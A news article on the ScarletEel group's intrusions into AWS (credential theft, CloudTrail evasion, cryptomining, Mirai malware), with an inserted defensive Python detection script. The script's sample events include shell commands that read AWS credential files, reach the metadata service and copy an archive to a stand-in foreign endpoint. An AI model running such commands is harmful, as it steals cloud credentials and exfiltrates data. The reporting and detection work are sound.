ScarletEel Hackers Gain Unauthorized Access to AWS Cloud

A financially motivated threat actor known as ScarletEel has been discovered infiltrating Amazon Web Services (AWS) in order to carry out various malicious activities, including stealing credentials and intellectual property, planting crypto mining software, and launching distributed denial-of-service (DDoS) attacks. These findings were first revealed in a blog post by cloud security firm Sysdig in February.

Sysdig researchers found that ScarletEel is highly knowledgeable about AWS tools, allowing them to easily move within cloud environments using native AWS functionality. They have also become more sophisticated in their tactics over time, evading cloud security detection mechanisms and expanding their arsenal to include DDoS-as-a-service.

The group’s latest intrusion involved exploiting Jupyter notebook containers within a Kubernetes cluster and running scripts to search for AWS credentials that could be sent back to their command-and-control server. The use of built-in shell commands instead of command line tools made their exfiltration techniques more stealthy and harder to detect.

ScarletEel also employed tools like Pacu and Peirates to identify opportunities for privilege escalation and explore and exploit a victim’s Kubernetes environment, respectively. To hide their activity, the hackers used a Russian server that supports the AWS protocol, masking the malicious nature of their actions. This also prevented the activity from being logged in the victim’s AWS CloudTrail logs.
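As an added defender-side illustration (not code from the article or from Sysdig), the two behaviours described above, credential hunting with shell builtins and S3 API calls sent to a non-AWS endpoint that never reach the victim's CloudTrail, as a small detection check over constructed runtime-sensor records; the record format, image names and hostnames are assumptions.

```python
import json
import re
from urllib.parse import urlparse

# Constructed runtime-sensor records (not real telemetry): one JSON object
# per line with the container image and the command line that was executed.
SAMPLE_EVENTS = """\
{"image":"jupyter/base-notebook","cmdline":"bash -c 'while read -r l; do echo $l; done < /root/.aws/credentials'"}
{"image":"jupyter/base-notebook","cmdline":"bash -c 'exec 3<>/dev/tcp/169.254.169.254/80'"}
{"image":"jupyter/base-notebook","cmdline":"aws s3 cp /tmp/c.tgz s3://drop/c.tgz --endpoint-url https://s3.example-hoster.invalid"}
{"image":"app/backend","cmdline":"aws s3 cp report.csv s3://corp-reports/ --endpoint-url https://s3.eu-west-1.amazonaws.com"}
{"image":"app/backend","cmdline":"python manage.py migrate"}
"""

# Credential-hunting indicators: the shared credentials file, the instance
# metadata service address, and expansion of the secret-key environment variable.
CREDENTIAL_PATTERNS = [
    (re.compile(r"\.aws/credentials"), "reads AWS shared credentials file"),
    (re.compile(r"169\.254\.169\.254"), "contacts instance metadata service"),
    (re.compile(r"\$\{?AWS_SECRET_ACCESS_KEY"), "expands AWS secret key variable"),
]
ENDPOINT_RE = re.compile(r"--endpoint-url[ =](\S+)")
AWS_SUFFIX = ".amazonaws.com"


def foreign_endpoint(cmdline):
    """Return the non-AWS host an aws CLI call is pointed at, or None."""
    m = ENDPOINT_RE.search(cmdline)
    if not m:
        return None
    host = urlparse(m.group(1)).hostname or ""
    return None if host.endswith(AWS_SUFFIX) else host


def analyze(events):
    """Return a list of (line_no, image, reason) for records matching a rule."""
    findings = []
    for n, line in enumerate(events.strip().splitlines(), start=1):
        rec = json.loads(line)
        cmd = rec["cmdline"]
        for pattern, reason in CREDENTIAL_PATTERNS:
            if pattern.search(cmd):
                findings.append((n, rec["image"], reason))
        host = foreign_endpoint(cmd)
        if host:
            findings.append((n, rec["image"],
                             f"S3 API call to non-AWS endpoint {host}; will not appear in CloudTrail"))
    return findings


if __name__ == "__main__":
    for n, image, reason in analyze(SAMPLE_EVENTS):
        print(f"line {n} [{image}]: {reason}")
```

The endpoint check catches the CloudTrail blind spot only at the process level; pairing it with egress controls that allow S3 traffic solely to AWS endpoints closes the gap at the network level too.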

The primary goals of ScarletEel are to steal proprietary software and perform cryptojacking. In their most recent campaign, they dropped 42 instances of cryptominers using a compromised account. Although they were quickly detected and stopped, the attackers persisted by attempting to use new and compromised accounts. However, they were unsuccessful due to a lack of privileges.

If the attack had been allowed to continue, it could have generated approximately $4,000 worth of cryptomining rewards on a daily basis. Additionally, ScarletEel planted malware from the Mirai botnet family called “Pandora,” which could be used for a separate DDoS-as-a-service campaign.

ScarletEel’s ability to infiltrate AWS’s Fargate compute engine demonstrates the challenges faced by traditional cloud security measures. Fargate is not commonly seen as part of the attack surface and is often used for back-end and internal purposes. However, ScarletEel’s activity on Fargate indicates that they are aware of the opportunities it presents and will likely target it in the future.

To defend against sophisticated attackers like ScarletEel, organizations must implement measures to prevent unauthorized access to their environment. However, given the attackers’ increasing sophistication, effective runtime security, cloud security posture management (CSPM), and cloud infrastructure entitlement management (CIEM) are also essential.

“It’s not enough to be protected in one way because the attackers today are really aware,” warns Alessandro Brucato, a threat research engineer for Sysdig. “They can exploit any detail.” The ever-evolving tactics of threat actors like ScarletEel highlight the importance of robust security measures for cloud environments.

In conclusion, ScarletEel’s activities within AWS highlight the need for organizations to prioritize cloud security and deploy comprehensive measures to safeguard their sensitive information and infrastructure. The ongoing evolution of threat actors requires constant vigilance and adaptation in order to effectively protect against potential attacks.
